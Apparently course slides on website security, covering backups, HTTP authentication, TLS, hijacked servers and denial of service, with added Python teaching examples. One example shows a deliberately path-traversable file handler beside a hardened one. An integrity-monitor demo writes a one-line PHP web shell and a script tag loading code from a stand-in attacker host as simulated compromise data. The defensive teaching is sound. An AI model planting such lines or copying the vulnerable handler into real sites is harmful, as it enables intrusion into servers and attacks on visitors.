Session Website Security

Page 1: Session Website Security. Session Outline Passwords Data Back-up Anti-virus Software Malware CMS Software

Session: Website Security

Page 2: Session Outline
- Passwords
- Data back-up
- Anti-virus software
- Malware
- CMS software

Page 3: This Session
Weekly Activity: Web Security Threats
Consider this: hackers can target personal information through internet connections (both front-end and back-end), ISPs (Internet Service Providers) and host databases.
Research recent news stories on instances of this occurring.
Suggest some recommendations on strategies to prevent these intrusions from recurring.
Word count: 200-300

Page 4: 10 Internet Security Tips
- Never enter personal information in an e-mail message when you don't know the recipient.
- Never enter personal information on a website reached through a link in an e-mail message.
- Never include personal information in an Internet forum, discussion group or newsgroup message.
- Never use the same password for all your electronic business.
- Never divulge personal information to others over an instant message connection.

Page 5: 10 Internet Security Tips (continued)
- Never use your mobile device on the road without turning on the firewall.
- Never buy from an online store that doesn't offer a secure, encrypted (HTTPS) connection when you're prompted for personal information and a credit card number.
- Never download a file from a site you don't trust.
- Never allow a stranger to connect to your computer using the Screen Sharing feature.
- Never allow young children to use the Internet without guidance and supervision.

Page 6: Computer Security
Keeping your computer free of viruses and other malware is a crucial part of running a business. Not all use of the internet is safe. Your organisation's computers may become infected with viruses and other malware if you are the victim of an online scam, if you download illegitimate software or if you visit a malicious, untrustworthy website.
If your organisation's computers are infected with malware, it can be a blow to your productivity. You may lose revenue if you cannot operate while computers are taken out of action, or you could lose whole projects and have to start them again.

Page 7: Computer Security
The consequences of picking up malware can extend beyond you and your organisation: it can become an issue of protecting your customers. Some types of malware steal data, including personal information about your customers, donors or supporters.

Page 8: Malicious Software
The internet is part of everyday life at home, work and school. It is important to be safe when online and to secure your computers and servers properly; otherwise you may be putting your home finances or business at risk.
If malicious software infects your computer equipment it can corrupt your files and allow others to access your confidential business information.

Page 9: Malicious Software
You can reduce the risks by having up-to-date security software installed and activated, by securing your internet connections and services, and by understanding and managing the emails and files you receive or download.
Backing up your data can also help you recover your information if a virus destroys your files, or if your computer is stolen or damaged.

Page 10: Malicious Software Protection
Protect against malicious software (malware). Viruses, spyware, trojans and worms are all types of malware: software designed to be installed on a computer system to cause harm to the user or others.
Malware can track your activity (spyware on a mobile device can even report your physical location) and steal information, including passwords, for identity theft or other crime.
Watch out for prompts or warnings asking whether you want to allow software to install or run. If you don't know what it is, don't accept the prompt.

Page 11: Things To Consider!
- Set and use strong passwords
- Remembering passwords
- Protect your email
- Manage and reduce spam
- Malware
- Prevent spyware from getting onto your computer
- Is your computer infected?
- Use online telephoning (VoIP)
- VoIP threats
- Minimising security threats

Page 12: Things To Consider!
- Back up your data
- Comparison of back-up options
- Frequency and types of back-ups
- The benefit of multiple back-ups
- Disaster recovery and back-ups
- Develop a back-up strategy
- Share files
- Sending and receiving files via email
- Sending and receiving files via portable storage devices
- Peer-to-peer file-sharing networks

Page 13: Things To Consider!
- Update software
- Updates for Windows
- Updates for Apple
- Updating anti-virus software and plugins
- Updating security software
- Anti-virus features
- Secure your internet connection
- Secure your wireless network
- Protect your web browser
- Cookies and security
- Access security settings in your browser

Page 14: Things To Consider!
- Secure your computers
- Secure your servers
- Secure your equipment
- Firewalls
- Remotely accessing your network
- Secure your network
- Secure your remote access

Page 15: Website Hacking Protection
Your organisation's website faces a range of security risks from other people, generally called 'hackers' (more specifically, 'black hat hackers').
Black hat hackers may try to access your computer directly and steal or modify your files while it is connected to the internet. They may also plant malware on your website to infect its visitors, and eavesdrop on your communications (for example, with a keystroke logger).

Page 16: Securing Your Website
It is important that businesses make sure their websites are not used to pass threats on to their visitors. This happens when a hacker alters the website's code to include malicious code that infects visitors' browsers as they load the page, known as a 'drive-by download'.
Commercial services are available that scan a website regularly for malware and known vulnerabilities. Some companies also scan your site for malware before issuing a 'trust seal' to reassure your users. A seal only shows that the scan passed on the day it ran; it is not a guarantee that the site is free of vulnerabilities.

Page 17: Internet Security Software
Most IT security software now includes a service that rates the websites you visit. These services should warn you if a website has known vulnerabilities or has been reported for illegal activity.
Some internet service providers (ISPs) have more advanced security features than others. Get in touch with your ISP if you would like to find out what measures it takes to protect your organisation's computers from online threats.

Page 18: Backing Up Data
It is common practice to insure an organisation against things like fire, theft and natural disasters. In a similar way, backing up your organisation's data and your website may help you recover what you've lost in the event of viruses, hackers, hardware failures or damage to hosting servers.

Page 19: Backup Systems
A good backup system typically includes:
- daily incremental backups to a portable hard drive, CD, DVD or cloud storage service
- end-of-week server backups, in-house and offsite
- quarterly server backups, offsite
- yearly server backups, offsite
Backing up your organisation's data: most organisations hold large amounts of important digital information on their computers, laptops, mobile phones, tablets and servers. This is called 'locally-stored data'.

Page 20: Backup Systems
No matter how big or small your organisation is, you risk losing this data if you don't back it up regularly. Fortunately, backing up locally-stored data is generally cost-effective and easy.
One way of backing up important files is to copy them to a different medium: CD, USB hard drive, a local server or a cloud storage service. Each medium has its own advantages.

Page 21: Backup Automation
Backing up your files can be automated: backup software copies your files to your chosen medium on a regular schedule.
Some free options include Apple Time Machine, CrashPlan and Windows 7 Backup and Restore.

Page 22: Backup Automation
Which backup method is best for my business? The method you choose generally depends on:
- the amount of data you need to back up
- how secure the data needs to be

Page 23: Website Backup
With a content management system (CMS), the CMS software provider should publish instructions for backing up your data on its own website.
If you are creating your website with the help of a web developer or website creation company, it may be worth talking to them about how to set up your own backup system.
It may also be worth finding out whether your web hosting service provides a backup service. This may cost money, but it could be a worthwhile investment if the loss of data would be a particularly large blow to your organisation.

Page 24: HTTP Authentication
Protect web content from those who don't have a "need to know": require users to authenticate with a userid and password before they are allowed access to certain URLs.
HTTP/1.1 specifies that when a client requests a protected resource, the server responds with a 401 status and a WWW-Authenticate response header. WWW-Authenticate carries enough information (the authentication scheme and the realm) to run a "challenge-response" exchange between the client and the server.
Exchange between web server and client:
1. The client requests a protected resource.
2. The server responds with 401 (Unauthorized) and a WWW-Authenticate challenge asking the client to authenticate.

Page 25: Client Response
Well-established clients such as Firefox and Internet Explorer respond to the challenge (WWW-Authenticate) by showing the user a small pop-up window with entry fields for userid and password, a Submit button and a Cancel button.
Entering a valid userid and password makes the browser resend the request with an Authorization header carrying the credentials; the server attempts authentication and, if it succeeds, serves the originally requested resource. With the Basic scheme the credentials are only base64-encoded, not encrypted, so it must be used over HTTPS.
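The two rounds of the exchange on pages 24 and 25, modelled in Python as an added example (this code is not from the original slides). The user store, realm name and function names are assumptions chosen for the illustration; the header names and the 401 status are what HTTP/1.1 and the Basic scheme (RFC 7617) specify.

```python
import base64
import hmac

# Constructed credential store (username -> password). Kept in plaintext only to
# keep the example short; a real server stores salted password hashes.
USERS = {"alice": "correct horse battery staple"}
REALM = "Protected Area"


def parse_basic_credentials(header_value):
    """Return (user, password) from an 'Authorization: Basic <base64>' value, or None."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")   # RFC 7617: user-id ":" password
    if not sep:
        return None
    return user, password


def credentials_valid(user, password):
    """Constant-time comparison so a wrong password cannot be detected by timing."""
    expected = USERS.get(user, "")
    matches = hmac.compare_digest(expected.encode("utf-8"), password.encode("utf-8"))
    return bool(expected) and matches


def handle_request(request_headers, protected_body):
    """Server side of the exchange: returns (status, response_headers, body).

    Without a usable Authorization header the server answers 401 and sends the
    WWW-Authenticate challenge naming the scheme and the realm."""
    auth = request_headers.get("Authorization")
    creds = parse_basic_credentials(auth) if auth else None
    if creds is not None and credentials_valid(*creds):
        return 200, {}, protected_body
    challenge = 'Basic realm="%s", charset="UTF-8"' % REALM
    return 401, {"WWW-Authenticate": challenge}, "Authentication required"


def client_authorization_header(user, password):
    """What the browser sends once the user fills in the userid/password pop-up."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode("utf-8")).decode("ascii")
    return "Basic " + token


if __name__ == "__main__":
    # Round 1: the client asks for the protected resource without credentials.
    status, headers, body = handle_request({}, "quarterly figures")
    print(status, headers)
    # Round 2: the client repeats the request with the Authorization header.
    hdr = {"Authorization": client_authorization_header("alice", "correct horse battery staple")}
    status, headers, body = handle_request(hdr, "quarterly figures")
    print(status, body)
```

Because the token is only base64, anyone who can read the connection can recover the password; run this over TLS only.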

Page 26: Website Authentication: Secure Sockets Layer (SSL)
- Developed by Netscape; its successor, TLS, is an open IETF standard that anyone may implement.
- An additional layer in the TCP/IP stack that sits between the Application and Transport layers.
- Ensures that all application data is encrypted, but the TCP/IP headers are not.
- Usually run on port 443 (the default HTTPS port).
Public Key Cryptography
- The owner of a private key gives the matching public key to everyone who wants to communicate with him. In RSA the key pair is derived from two large secret primes whose product is the public modulus (1024-bit moduli were once typical; 2048 bits or more is now the accepted minimum). The owner keeps the private key secret and uses it to decrypt information that was encrypted with the public key.
- The RSA algorithm is the most notable public-key cipher.

Page 27: Website Authentication: Digital Certificates
- Issued by a disinterested third party, the certificate authority (CA), for example Verisign.
- The certificate contains the public key of the specific web server, the identity it is bound to (the server's hostname) and a digital signature of the certifying authority. The browser checks that signature against the CAs it trusts.

Page 28: SSL Encryption
- During the handshake that sets up the secure session, the client (source) receives the server's (destination's) certificate. It is sent in the clear inside the handshake, before any HTTP headers are exchanged; nothing in it is secret.
- Once the client accepts the certificate as authentic, it uses the public key from the certificate to protect the session key that will encrypt the conversation. (With RSA key exchange the client encrypts the key material with that public key directly; modern TLS derives the session key with ephemeral Diffie-Hellman instead and uses the certificate's key only to sign the handshake.)
- The session key is protected with an asymmetric cipher (slow); the conversation itself is encrypted with a symmetric cipher (fast). It is done this way to speed up overall communication: the slow asymmetric operation is used as little as possible, and the fast symmetric cipher, which is no weaker, carries most of the exchange.
- The actual cipher algorithms are negotiated per session.
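The hybrid scheme on this page (public key wraps a session key, symmetric cipher carries the traffic), as an added example that is not from the original slides. To keep it self-contained it uses textbook RSA with two constructed 7-digit primes and an HMAC-SHA256 keystream in place of the negotiated bulk cipher; both choices, and every name below, are assumptions for illustration, and the toy RSA (tiny modulus, no padding) is not secure.

```python
import hashlib
import hmac
import os

# --- Asymmetric part: textbook RSA with two small constructed primes. ---
# INSECURE illustration only: real keys use ~1024-bit primes (a 2048-bit modulus)
# and OAEP padding; this just makes the key-wrapping arithmetic visible.
P, Q = 1000003, 1000033
E = 65537


def make_keypair():
    """Return (public, private) as (n, e) and (n, d)."""
    n = P * Q
    phi = (P - 1) * (Q - 1)
    d = pow(E, -1, phi)        # modular inverse (Python 3.8+)
    return (n, E), (n, d)


def rsa_wrap(public, session_key):
    """Encrypt a 16-byte session key with the server's public key.

    The toy modulus is only ~40 bits, so the key is wrapped in 4-byte chunks."""
    n, e = public
    return [pow(int.from_bytes(session_key[i:i + 4], "big"), e, n)
            for i in range(0, len(session_key), 4)]


def rsa_unwrap(private, wrapped):
    """The server recovers the session key with its private key."""
    n, d = private
    return b"".join(pow(c, d, n).to_bytes(4, "big") for c in wrapped)


# --- Symmetric part: a CTR-style keystream derived with HMAC-SHA256. ---
# Stands in for the negotiated bulk cipher (e.g. AES-GCM); no integrity tag here.
def keystream(key, nonce, length):
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def symmetric_encrypt(key, plaintext):
    nonce = os.urandom(16)     # fresh per message so the keystream is never reused
    ct = bytes(a ^ b for a, b in zip(plaintext, keystream(key, nonce, len(plaintext))))
    return nonce + ct


def symmetric_decrypt(key, blob):
    nonce, ct = blob[:16], blob[16:]
    return bytes(a ^ b for a, b in zip(ct, keystream(key, nonce, len(ct))))


# --- The exchange: one slow public-key operation, then fast symmetric traffic. ---
def client_send(server_public, message):
    session_key = os.urandom(16)
    return rsa_wrap(server_public, session_key), symmetric_encrypt(session_key, message)


def server_receive(server_private, wrapped_key, blob):
    session_key = rsa_unwrap(server_private, wrapped_key)
    return symmetric_decrypt(session_key, blob)


if __name__ == "__main__":
    public, private = make_keypair()     # the public half is what the certificate carries
    wrapped, blob = client_send(public, b"GET /account HTTP/1.1")
    print(server_receive(private, wrapped, blob))
```

Only the 16-byte session key ever goes through the modular exponentiation; every byte of the request is handled by the cheap XOR with the keystream, which is the whole point of the hybrid design.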

Page 29: Internet Security Today
What are the main security-related problems on the Internet today?
- Hijacked web servers
- Denial-of-Service attacks
- Unsolicited commercial e-mail
- Operator error, natural disasters
- Microsoft...

Page 30: Internet Security Today
What are not the major security-related problems?
- Eavesdropped electronic mail. (Misdirected email is a problem. Email swiped from backup tapes is a problem.)
- Sniffed credit card numbers. (Credit card numbers stolen from databases are a problem.)
- Hostile Java and ActiveX applets.

Page 31: Hijacked Web Servers
The attacker gains access and changes the contents of the web server. Usually stunts (defacement), but it can be very bad:
- The attacker can plant hostile applets (an applet is a small application that performs one specific task).
- The attacker can plant data sniffers (i.e. capture data being transmitted on the network).
- The attacker can use the compromised machine to take over internal systems.

Page 32: Hijacked Web Servers
Usually outsiders (though they could be insiders masquerading as outsiders). Nearly impossible to trace.

Page 33: How do they do it?
- Administrative passwords captured by a password sniffer.
- Exploiting a known vulnerability: a sendmail bug, a buffer overflow.
- Using a web server CGI script to read the /etc/passwd file (on modern Unix systems the password hashes live in /etc/shadow), then cracking the passwords offline. (Common Gateway Interface (CGI) is a standard environment for web servers to interface with executable programs installed on the server that generate web pages.)
- Mounting the web server's filesystem over the network.
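The CGI file-read bullet above, shown as an added example (not from the slides): a file-serving handler that joins user input onto the document root, beside a hardened version that resolves the path and refuses anything outside it. Everything runs in a temporary directory with a constructed stand-in for /etc/passwd; the function names and sandbox layout are assumptions.

```python
import os
import tempfile


def serve_file_vulnerable(docroot, requested):
    """The pattern the slide describes: the CGI script joins the user-supplied name
    onto the document root, so '../etc/passwd' walks straight out of it."""
    with open(os.path.join(docroot, requested), "rb") as f:
        return f.read()


def serve_file_hardened(docroot, requested):
    """Resolve symlinks and '..' first, then refuse anything outside the docroot."""
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("request escapes the document root: %r" % requested)
    with open(target, "rb") as f:
        return f.read()


def demo():
    """Run both versions against a constructed sandbox; nothing outside the temp dir is touched."""
    with tempfile.TemporaryDirectory() as tmp:
        docroot = os.path.join(tmp, "www")
        os.makedirs(docroot)
        os.makedirs(os.path.join(tmp, "etc"))
        with open(os.path.join(docroot, "index.html"), "w") as f:
            f.write("<h1>hello</h1>")
        with open(os.path.join(tmp, "etc", "passwd"), "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")      # constructed stand-in

        leaked = serve_file_vulnerable(docroot, "../etc/passwd")
        try:
            serve_file_hardened(docroot, "../etc/passwd")
            blocked = False
        except PermissionError:
            blocked = True
        try:
            # An absolute path makes os.path.join discard the docroot entirely;
            # realpath + commonpath still catches it.
            serve_file_hardened(docroot, os.path.join(tmp, "etc", "passwd"))
            absolute_blocked = False
        except PermissionError:
            absolute_blocked = True
        legitimate = serve_file_hardened(docroot, "index.html")
        return leaked, blocked, absolute_blocked, legitimate


if __name__ == "__main__":
    leaked, blocked, absolute_blocked, legitimate = demo()
    print("vulnerable handler leaked:", leaked.decode().strip())
    print("hardened handler blocked traversal:", blocked, "absolute path:", absolute_blocked)
    print("hardened handler still serves:", legitimate.decode())
```

The check must run on the resolved path, not on the string the client sent: a filter that only rejects the literal `..` is bypassed by symlinks inside the docroot and by absolute paths.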

Page 34: How do you defend against it?
- Patch known bugs.
- Don't run unnecessary services on the web server; in particular, don't run sendmail on it.
- Use sniffer-detection software where possible.

Page 35: How do you defend against it?
- Practice good host security: harden the operating system rather than running it in its default, open configuration, and use operating system monitoring tools.
- Monitor the system for unauthorized changes (Tripwire).
- Monitor the system for signs of penetration (intrusion detection systems).
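What the "monitor for unauthorized changes" bullet means in practice, as an added example (not from the slides, and not Tripwire's own code): take a SHA-256 baseline of a web root, then diff a later snapshot against it. The constructed web root, the injected script, the dropped web shell and the host name in it are all made up for the demonstration.

```python
import hashlib
import json
import os
import tempfile


def snapshot(root):
    """Map each file under root (path relative to root, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def compare(baseline, current):
    """Report what changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline.keys() & current.keys()
                           if baseline[p] != current[p]),
    }


def demo():
    """Constructed web root. A real baseline is stored off-host or signed, so an
    attacker who owns the server cannot simply re-baseline after the change."""
    def write(tmp, rel, text):
        with open(os.path.join(tmp, rel), "w") as f:
            f.write(text)

    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "cgi-bin"))
        write(tmp, "index.html", "<html><body>Welcome</body></html>")
        write(tmp, os.path.join("cgi-bin", "form.cgi"), "#!/bin/sh\necho ok\n")
        # Round-trip through JSON, as the baseline would be when saved to disk.
        baseline = json.loads(json.dumps(snapshot(tmp)))

        # Simulate a hijack: injected script tag, dropped web shell, deleted CGI script.
        write(tmp, "index.html",
              '<html><body>Welcome<script src="http://attacker.example/x.js"></script></body></html>')
        write(tmp, "shell.php", "<?php system($_GET['c']); ?>")
        os.remove(os.path.join(tmp, "cgi-bin", "form.cgi"))
        return compare(baseline, snapshot(tmp))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Hashing the content, rather than trusting modification times, matters because an attacker with write access can reset mtimes; the hash cannot be faked without changing the bytes back.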

Page 36: How do you defend against it?
- Make frequent backups.
- Have a hot spare ready.
- Monitor your system frequently.

Page 37: Denial-of-Service
A denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users. For the attacker, the publicity is almost as good as changing somebody's web server.
Examples: an attack on a web server; the attack on Cyber Promotions.
It costs real money: lost sales and damage to reputation.

Page 38: Kinds of Denial-of-Service Attacks
- Direct attack: attack the machine itself.
- Indirect attack: attack something that points to the machine.
- Reputation attack: the attack has nothing to do with the machine, but references it in some way.

Page 39: Direct Denial-Of-Service Attack
- Flood the target with requests (HTTP, finger, SMTP, e-mail).
- Easy to trace when the requests come from the attacker's real address; spoofed source addresses or a distributed attack (DDoS) from many hosts are much harder.
- Relatively easy to defend against with TCP/IP blocking at the router, as long as the sources are few enough to enumerate.
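The detect-then-block loop for a direct flood, as an added example that is not from the slides: count requests per source address in a sliding window over Common Log Format access-log lines and emit router/host block rules for sources that exceed a threshold. The log lines are constructed (documentation-range addresses), and the window, threshold and function names are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common Log Format: host ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" \d{3} \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(line):
    """Return (source_ip, timestamp) or None for a line that is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group(1), datetime.strptime(m.group(2), TS_FMT)


def flooding_sources(lines, window_seconds=10, threshold=50):
    """Sliding window per source address: flag any source that exceeds `threshold`
    requests within `window_seconds`. Returns {ip: time first flagged}."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ip, ts = parsed
        window = recent[ip]
        window.append(ts)
        while ts - window[0] > timedelta(seconds=window_seconds):
            window.popleft()
        if len(window) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


def block_rules(flagged):
    """Filter lines for the flagged sources (iptables syntax; a router ACL is analogous).
    Only meaningful when the sources are few and not spoofed."""
    return ["iptables -A INPUT -s %s -j DROP" % ip for ip in sorted(flagged)]


def constructed_log():
    """Constructed sample: one source sends 120 GETs in 5 s, another 5 in a minute."""
    start = datetime(2023, 10, 10, 13, 55, 36, tzinfo=timezone.utc)
    stamp = lambda t: t.strftime(TS_FMT)
    lines = ['203.0.113.7 - - [%s] "GET / HTTP/1.1" 200 512'
             % stamp(start + timedelta(milliseconds=42 * i)) for i in range(120)]
    lines += ['198.51.100.20 - - [%s] "GET /index.html HTTP/1.1" 200 2048'
              % stamp(start + timedelta(seconds=12 * i)) for i in range(5)]
    lines.append("not an access-log line")
    return lines


if __name__ == "__main__":
    flagged = flooding_sources(constructed_log())
    for ip, when in flagged.items():
        print("flood from %s, first seen over threshold at %s" % (ip, when.isoformat()))
    print("\n".join(block_rules(flagged)))
```

Against a distributed attack the same counter shows thousands of sources each below the threshold; there the per-source rule list is useless and the defence has to move upstream, which is why the slide's "easy to defend" holds only for the direct case.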

Page 40: Unsolicited Commercial E-Mail
- Pits freedom of speech against the right to privacy.
- Consumes vast amounts of management time.
- A drain on system resources.

Page 41: Who are the bulk-mailers?
- Advertising aimed at Internet neophytes.
- Advertising for sexually-oriented services.
- Advertising get-rich-quick schemes.
- Advertising bulk-mail services.

Page 42: How do they send out messages?
- Directly from their own site.
- Through an innocent third party (an open relay).
- With a computer virus or ActiveX applet.

Page 43: How did they get my e-mail address?
- Usenet and mailing-list archives.
- Collected from an online address book.
- AOL registry.
- University directory.
- Guessed sequential CompuServe addresses.
- Broke into a machine and stole usernames.

Page 44: Operator Error & Natural Disasters
- Still a major source of data loss.
- Hard to get management to take seriously: not a priority (i.e. invisible), preparation is expensive, and if nothing happens the money seems misspent.

Page 45: Operator Error
- Accidentally delete a file.
- Accidentally install a bad service.
- Accidentally break a CGI script.
- Psychotic break.

Page 46: Natural Disaster
- Fire
- Flood
- Earthquake

Page 47: Solutions
Frequent backups:
- Back up to high-speed tape.
- Real-time backup to spare machines.
- Make sure some backups are off-site.
Recovery plans and a recovery centre. Test your backups and your plans!

Page 48: Microsoft
- Danger of a homogeneous environment.
- No demonstrated commitment to computer security.
- Windows operating systems often not secure: Word macro viruses, ActiveX, SMB.
- Windows system releases premature.

Page 49: Next Session
Weekly Activity: Good Website Design
Consider this: effective web design is judged by the users of the website, not by the website owners. Many factors affect the usability of a website, and it is not just about form (how good it looks) but also function (how easy it is to use).
Websites that are not well designed tend to perform poorly and have sub-optimal Google Analytics metrics (e.g. high bounce rates, low time on site, low pages per visit and low conversions).
So what makes good web design? Identify and briefly discuss the web design principles that will make your website aesthetically pleasing, easy to use, engaging and effective.
Word count: 200-300